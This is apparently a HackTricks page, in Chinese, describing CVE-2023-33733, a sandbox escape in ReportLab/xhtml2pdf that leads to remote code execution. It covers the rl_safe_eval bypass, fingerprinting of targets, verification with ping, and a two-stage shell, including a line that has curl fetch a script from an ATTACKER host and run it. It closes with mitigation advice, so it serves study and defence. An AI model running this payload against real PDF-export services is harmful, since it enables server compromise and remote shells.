hacktricks/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md

ReportLab/xhtml2pdf [...] 表达式求值 RCE (CVE-2023-33733)

{{#include ../../../banners/hacktricks-training.md}}

本页记录了一个在 ReportLab 的 rl_safe_eval 中的实用沙箱逃逸和 RCE 原语，该函数被 xhtml2pdf 及其他将用户可控 HTML 渲染为 PDF 的流水线所使用。

CVE-2023-33733 影响 ReportLab 直到并包括 3.6.12 的版本。在某些属性上下文（例如 color）中，包裹在三重方括号 [ ... ] 的值会被 rl_safe_eval 在服务器端求值。通过构造一个从被列入白名单的 builtin（pow）枢纽到其 Python 函数 globals 的有效负载，攻击者可以到达 os 模块并执行命令。

关键点

• 触发：向由 ReportLab/xhtml2pdf 解析的标记中被求值的属性（例如 ）注入 [ ... ]。
• 沙箱：rl_safe_eval 会替换危险的 builtins，但已求值的函数仍然暴露 globals。
• 绕过：构造一个瞬态类 Word 来绕过 rl_safe_eval 的名称检查并访问字符串 "globals"，同时避免被阻止的 dunder 过滤。
• RCE：getattr(pow, Word("globals"))["os"].system("")
• 稳定性：执行后为属性返回一个有效值（对于 color，使用 and 'red'）。

测试时机

• 暴露 HTML-to-PDF 导出（用户资料、发票、报告）并在 PDF 元数据或 HTTP 响应注释中显示 xhtml2pdf/ReportLab 的应用。
• exiftool profile.pdf | egrep 'Producer|Title|Creator' → "xhtml2pdf" producer
• PDF 的 HTTP 响应通常以 ReportLab 的 generator 注释开头

沙箱绕过工作原理

• rl_safe_eval 删除或替换了许多 builtin（getattr, type, pow, ...）并对名称应用过滤以拒绝以 __ 开头或在 denylist 中的属性。
• 然而，安全函数存在于可被访问的 func.globals 的 globals 字典中。
• 使用 type(type(1)) 恢复真实的内建 type 函数（绕过 ReportLab 的包装），然后定义一个从 str 派生的 Word 类并修改比较行为，使得：
  • .startswith('') → 始终 False（绕过 name startswith('') 检查）
  • .eq 在第一次比较时返回 False（绕过 denylist 成员检查），之后返回 True（使 Python getattr 工作）
  • .hash 等于 hash(str(self))
• 这样，getattr(pow, Word('globals')) 返回被包装的 pow 函数的 globals 字典，其中包含导入的 os 模块。然后：['os'].system('')。

最小利用模式（属性示例） 将有效负载放在被求值的属性中，并确保通过布尔与 'red' 返回一个有效的属性值。

exploit

• 列表推导式形式允许单一表达式被 rl_safe_eval 接受。
• 尾部的 and 'red' 返回一个有效的 CSS 颜色，使渲染不出错。
• 根据需要替换命令；使用 ping 并配合 tcpdump 验证执行。

操作流程

1. 识别 PDF 生成器

• PDF Producer 显示 xhtml2pdf；HTTP 响应包含 ReportLab 注释。

2. 找到被反射到 PDF 的输入（例如资料简介/描述）并触发导出。
3. 使用低噪声 ICMP 验证执行

• 运行：sudo tcpdump -ni icmp
• 有效负载：... system('ping <your_ip>') ...
• Windows 通常默认发送恰好四个 echo 请求。

4. 建立 shell

• 对于 Windows，可靠的两阶段方法可以避免引用/编码问题：
• 阶段 1（下载）：

exploit

• 阶段 2（执行）：

exploit

• 对于 Linux 目标，可以使用类似的 curl/wget 两阶段：
• system('curl http://ATTACKER/s.sh -o /tmp/s; sh /tmp/s')

注意事项和提示

• 属性上下文：color 是已知的被求值属性；ReportLab 标记中的其他属性也可能会求值。如果某个位置被消毒，尝试渲染到 PDF 流中的其他位置（不同字段、表格样式等）。
• 引用：保持命令简洁。两阶段下载大大减少引用和转义的问题。
• 可靠性：如果导出被缓存或排队，稍微改变有效负载（例如随机路径或查询）以避免命中缓存。

缓解与检测

• 升级 ReportLab 至 3.6.13 或更高版本（CVE-2023-33733 已修复）。同时关注发行版包的安全公告。
• 不要在未经严格清理的情况下将用户可控的 HTML/标记直接输入到 xhtml2pdf/ReportLab。对于不受信任的输入，移除/拒绝 [...] 求值构造和厂商特定标签。
• 考虑对不受信任输入完全禁用或包装 rl_safe_eval 的使用。
• 在 PDF 生成期间监视可疑的出站连接（例如导出文档时应用服务器发出的 ICMP/HTTP）。

参考资料

• PoC 与技术分析: c53elyas/CVE-2023-33733
• 0xdf University HTB write-up（真实世界利用，Windows 两阶段有效负载）：HTB: University
• NVD 条目（受影响版本）：CVE-2023-33733
• xhtml2pdf 文档（标记/页面 概念）：xhtml2pdf docs

{{#include ../../../banners/hacktricks-training.md}}